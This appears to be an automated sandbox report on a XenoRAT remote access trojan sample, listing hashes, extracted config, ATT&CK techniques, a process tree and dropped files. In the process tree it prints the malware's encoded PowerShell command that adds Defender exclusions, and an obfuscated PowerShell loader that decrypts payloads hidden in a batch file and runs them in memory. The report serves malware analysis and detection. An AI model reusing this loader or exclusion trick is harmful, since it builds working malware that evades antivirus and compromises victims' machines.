xenorat | a94a79df8c332ae5de59b99853ae97dc8a1fc272818a146bd7ad1d5e295611c5

General

Target

optimiser.exe
Size

431KB
MD5

74cb80305f51ff0585928c12be72dddd
SHA1

727a72de8f439beebf028f21d3cb58f45f99e42a
SHA256

a94a79df8c332ae5de59b99853ae97dc8a1fc272818a146bd7ad1d5e295611c5
SHA512

21775770e10ae19302d198d7c48799bc510aee0c7e92563798ba151760181facc6ba9452400cde84e3018881ec1a54ac82d1fd9b587c4bc2305af3b5793cf178
SSDEEP

12288:9uBadWfqCQi/szyz7FaFAf69ffou1R1L:9iadWfEssOzZusmPR

Score

10^/10

xenorat execution rat trojan

Malware Config

Extracted

Family

xenorat

C2

127.0.0.1

Attributes

delay
5000
install_path
temp
port
7788
startup_name
lol

Signatures

XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

1768 powershell.exe
4692 powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

optimiser.exesdsd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	optimiser.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	sdsd.exe

Executes dropped EXE 2 IoCs

Processes:

sdsd.exesdsd.exe

pid process

992 sdsd.exe
4412 sdsd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
992	sdsd.exe
4412	sdsd.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

Processes:

powershell.exepowershell.exe

pid	process
1768	powershell.exe
4692	powershell.exe
4692	powershell.exe
1768	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1768 powershell.exe
Token: SeDebugPrivilege 4692 powershell.exe

description	pid	process
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	4692	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

optimiser.execmd.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 948 wrote to memory of 1768	948	optimiser.exe	powershell.exe
PID 948 wrote to memory of 1768	948	optimiser.exe	powershell.exe
PID 948 wrote to memory of 1768	948	optimiser.exe	powershell.exe
PID 948 wrote to memory of 628	948	optimiser.exe	cmd.exe
PID 948 wrote to memory of 628	948	optimiser.exe	cmd.exe
PID 948 wrote to memory of 628	948	optimiser.exe	cmd.exe
PID 948 wrote to memory of 2000	948	optimiser.exe	cmd.exe
PID 948 wrote to memory of 2000	948	optimiser.exe	cmd.exe
PID 948 wrote to memory of 2000	948	optimiser.exe	cmd.exe
PID 628 wrote to memory of 228	628	cmd.exe	mode.com
PID 628 wrote to memory of 228	628	cmd.exe	mode.com
PID 628 wrote to memory of 228	628	cmd.exe	mode.com
PID 628 wrote to memory of 4420	628	cmd.exe	cmd.exe
PID 628 wrote to memory of 4420	628	cmd.exe	cmd.exe
PID 628 wrote to memory of 4420	628	cmd.exe	cmd.exe
PID 4420 wrote to memory of 4348	4420	cmd.exe	findstr.exe
PID 4420 wrote to memory of 4348	4420	cmd.exe	findstr.exe
PID 4420 wrote to memory of 4348	4420	cmd.exe	findstr.exe
PID 2000 wrote to memory of 1388	2000	cmd.exe	cmd.exe
PID 2000 wrote to memory of 1388	2000	cmd.exe	cmd.exe
PID 2000 wrote to memory of 1388	2000	cmd.exe	cmd.exe
PID 2000 wrote to memory of 4692	2000	cmd.exe	powershell.exe
PID 2000 wrote to memory of 4692	2000	cmd.exe	powershell.exe
PID 2000 wrote to memory of 4692	2000	cmd.exe	powershell.exe
PID 4692 wrote to memory of 3428	4692	powershell.exe	Explorer.EXE
PID 4692 wrote to memory of 2164	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 1148	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 1372	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 776	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 2148	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 4904	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 2724	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 2520	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 1140	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 1332	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 1724	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 2704	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 1124	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 2388	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 1116	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 2688	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 1308	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 912	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 1696	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 1892	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 4984	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 3464	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 3660	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 3168	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 896	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 1880	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 1676	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 1652	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 2240	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 2628	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 1044	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 4920	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 1828	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 2812	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 1036	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 2024	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 3592	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 1224	4692	powershell.exe	svchost.exe
PID 4692 wrote to memory of 2008	4692	powershell.exe	svchost.exe

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
PID:776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1036

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1116

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1124

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1148

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1576

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1696

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1880

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2164

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3180

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3428

C:\Users\Admin\AppData\Local\Temp\optimiser.exe
"C:\Users\Admin\AppData\Local\Temp\optimiser.exe"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAZQBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAawBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAcABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAaAB1ACMAPgA="
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ExclusiveBatchTwo.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:628

C:\Windows\SysWOW64\mode.com
mode 800
4⤵
PID:228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\ExclusiveBatchTwo.bat"
4⤵
- Suspicious use of WriteProcessMemory
PID:4420

C:\Windows\SysWOW64\findstr.exe
findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\ExclusiveBatchTwo.bat"
5⤵
PID:4348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sdsd.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uE03OF756EwHDsXZZ4dW1daMDjFkoEm1g+uRel3+taQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OQwUXKYXuHYJURyKYIwNjA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $okmXp=New-Object System.IO.MemoryStream(,$param_var); $xIYUl=New-Object System.IO.MemoryStream; $muRJA=New-Object System.IO.Compression.GZipStream($okmXp, [IO.Compression.CompressionMode]::Decompress); $muRJA.CopyTo($xIYUl); $muRJA.Dispose(); $okmXp.Dispose(); $xIYUl.Dispose(); $xIYUl.ToArray();}function execute_function($param_var,$param2_var){ $BISrT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DWUga=$BISrT.EntryPoint; $DWUga.Invoke($null, $param2_var);}$kcqDb = 'C:\Users\Admin\AppData\Local\Temp\sdsd.bat';$host.UI.RawUI.WindowTitle = $kcqDb;$qjwUw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kcqDb).Split([Environment]::NewLine);foreach ($BKyFZ in $qjwUw) { if ($BKyFZ.StartsWith('mfixKLpOscLidzGbRQVv')) { $QJzdJ=$BKyFZ.Substring(20); break; }}$payloads_var=[string[]]$QJzdJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
4⤵
PID:1388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4692

C:\Users\Admin\AppData\Local\Temp\sdsd.exe
"C:\Users\Admin\AppData\Local\Temp\sdsd.exe"
5⤵
- Checks computer location settings
- Executes dropped EXE
PID:992

C:\Users\Admin\AppData\Local\Temp\XenoManager\sdsd.exe
"C:\Users\Admin\AppData\Local\Temp\XenoManager\sdsd.exe"
6⤵
- Executes dropped EXE
PID:4412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
PID:3168

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4984

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:3464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:1676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4484

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sdsd.exe.log
Filesize
226B

MD5
916851e072fbabc4796d8916c5131092

SHA1
d48a602229a690c512d5fdaf4c8d77547a88e7a2

SHA256
7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d

SHA512
07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

Download Submit
C:\Users\Admin\AppData\Local\Temp\ExclusiveBatchTwo.bat
Filesize
27KB

MD5
d717847f40deba47954806864cbb41e6

SHA1
870ce3a8ccbf6c8ea6b1188592319f57e9fadc52

SHA256
4a389d61282947a697f5a2629c64248059eca904b266f08a64f76341c3967f8d

SHA512
91e1156c3bb9fb33f037cd7db01a64e92778561cb6ceec35a2eeac379d2d945e6636138a054503776803590429688f77d8219589a12c598c84625e18c21b33f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lc02l5nk.52a.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\sdsd.bat
Filesize
399KB

MD5
dedc70c320233bc67ceb02a9492f29d6

SHA1
d031a05a302501a50581a2338762013f60da62df

SHA256
c1836c0d56c8ec60cee58783c67c900f170d854e60f856c1a5b9e001894c8e1a

SHA512
776e753db2a34143981814c44fb0e8bdfa78b38d186ce9e794cd927f28408397460f302d63d731f4c6794cd745164211370b9db7b47b4884d01c5f76f066f93e

Download Submit
C:\Users\Admin\AppData\Local\Temp\sdsd.exe
Filesize
45KB

MD5
41146957ad1a37a26565c42ac174609a

SHA1
622b3cd22edd11ba59ec438e14fe96d0c03d5026

SHA256
320b867ae9cbb01c732fab179a66d1c63ea3498f6dae49e4d1cfcb5d5e0cb1fc

SHA512
d763fd0086ec0e6fbd0b2d73ed86ff6e08079fc3651e83e91c0ab198189d313db2b2ace8d72c55178d463647eeb8cafa1a511cbf2bc366959f3fea9be0b9079d

Download Submit
memory/992-75-0x0000000000940000-0x0000000000952000-memory.dmp

Filesize
72KB

Download
memory/1768-39-0x00000000069B0000-0x00000000069E2000-memory.dmp

Filesize
200KB

Download
memory/1768-63-0x00000000079F0000-0x0000000007A04000-memory.dmp

Filesize
80KB

Download
memory/1768-15-0x0000000005E00000-0x0000000005E66000-memory.dmp

Filesize
408KB

Download
memory/1768-13-0x0000000005420000-0x0000000005442000-memory.dmp

Filesize
136KB

Download
memory/1768-9-0x0000000002DF0000-0x0000000002E26000-memory.dmp

Filesize
216KB

Download
memory/1768-35-0x00000000063F0000-0x000000000640E000-memory.dmp

Filesize
120KB

Download
memory/1768-36-0x00000000067E0000-0x000000000682C000-memory.dmp

Filesize
304KB

Download
memory/1768-92-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/1768-10-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/1768-40-0x0000000074890000-0x00000000748DC000-memory.dmp

Filesize
304KB

Download
memory/1768-50-0x0000000006990000-0x00000000069AE000-memory.dmp

Filesize
120KB

Download
memory/1768-6-0x0000000074CAE000-0x0000000074CAF000-memory.dmp

Filesize
4KB

Download
memory/1768-51-0x0000000006A10000-0x0000000006AB3000-memory.dmp

Filesize
652KB

Download
memory/1768-77-0x0000000007A20000-0x0000000007A28000-memory.dmp

Filesize
32KB

Download
memory/1768-74-0x0000000007AD0000-0x0000000007AEA000-memory.dmp

Filesize
104KB

Download
memory/1768-54-0x0000000007790000-0x000000000779A000-memory.dmp

Filesize
40KB

Download
memory/1768-55-0x0000000007A30000-0x0000000007AC6000-memory.dmp

Filesize
600KB

Download
memory/1768-56-0x00000000079A0000-0x00000000079B1000-memory.dmp

Filesize
68KB

Download
memory/1768-12-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/1768-11-0x0000000005530000-0x0000000005B58000-memory.dmp

Filesize
6.2MB

Download
memory/1768-14-0x0000000005D90000-0x0000000005DF6000-memory.dmp

Filesize
408KB

Download
memory/1768-62-0x00000000079E0000-0x00000000079EE000-memory.dmp

Filesize
56KB

Download
memory/4692-61-0x0000000002A80000-0x0000000002A92000-memory.dmp

Filesize
72KB

Download
memory/4692-58-0x00000000076C0000-0x0000000007714000-memory.dmp

Filesize
336KB

Download
memory/4692-57-0x0000000002A70000-0x0000000002A78000-memory.dmp

Filesize
32KB

Download
memory/4692-53-0x0000000007410000-0x000000000742A000-memory.dmp

Filesize
104KB

Download
memory/4692-52-0x0000000007B30000-0x00000000081AA000-memory.dmp

Filesize
6.5MB

Download
memory/4692-38-0x0000000007430000-0x00000000074A6000-memory.dmp

Filesize
472KB

Download
memory/4692-37-0x0000000007280000-0x00000000072C4000-memory.dmp

Filesize
272KB

Download
memory/4692-34-0x0000000005BE0000-0x0000000005F34000-memory.dmp

Filesize
3.3MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads